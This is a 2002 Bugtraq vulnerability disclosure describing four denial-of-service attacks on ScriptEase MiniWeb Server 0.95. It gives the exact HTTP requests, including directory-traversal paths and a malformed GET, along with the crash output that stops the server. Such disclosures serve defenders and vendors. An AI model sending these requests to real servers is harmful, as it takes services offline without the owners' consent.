Four More ScriptEase MiniWeb Server v0.95 DoS Attacks

From: 'ken'@FTU
Date: 02/20/02


Date: Tue, 19 Feb 2002 23:03:37 -0500
From: "'ken'@FTU" <ken_at_ftu@yahoo.com>
To: bugtraq@securityfocus.com, bugs@securitytracker.com

The following are four more Server Denial of Service Attacks against
ScriptEase MiniWeb Server 0.95.

These attacks do not make the server point to an invalid memory address
like the previous post.

I believe the first two attacks I describe are internal server problems
due to either coding errors or incomplete coding. The second two may
just be configuration problems on my part, as this assessment was done
fairly quickly.

After we receieve "Press a key..." on the server side, the server stops
and needs to be manually restarted.

Thanks to Tamer Sahin for his earlier post.
(http://www.securityfocus.com/archive/1/257031)

Cheers,
'ken'@FTU

<--------------- BOF ------------->

Dos One.
We Send:
GET /%2e%2e/ HTTP/1.0

ScriptEase Internal Server Reply:
1512: Cannot compare variable of different dimension.
Press a key...

=======

Dos Two.
We Send:
GET /../../../../../../../../../ HTTP/1.0

ScriptEase Internal Server Reply:
1512: Cannot compare variable of different dimension.
Press a key...

=======

Dos Three.
We Send:
GET HTTP/1.0

ScriptEase Internal Server Reply:
5108: Invalid VA_LIST.
Press a key...

=======

Dos Four.
We Send:
GET ../../../../../../../../../../ HTTP/1.0

ScriptEase Internal Server Reply:
5108: Invalid VA_LIST.
Press a key...

<--------------- EOF ------------->

-- 
"I grew convinced that truth, sincerity and integrity in dealings 
between man and man were of the utmost importance to the felicity of 
life, and I formed a written resolution to practise them ever while I 
lived."
	-Benjamin Franklin, The Autobiography of Benjamin Franklin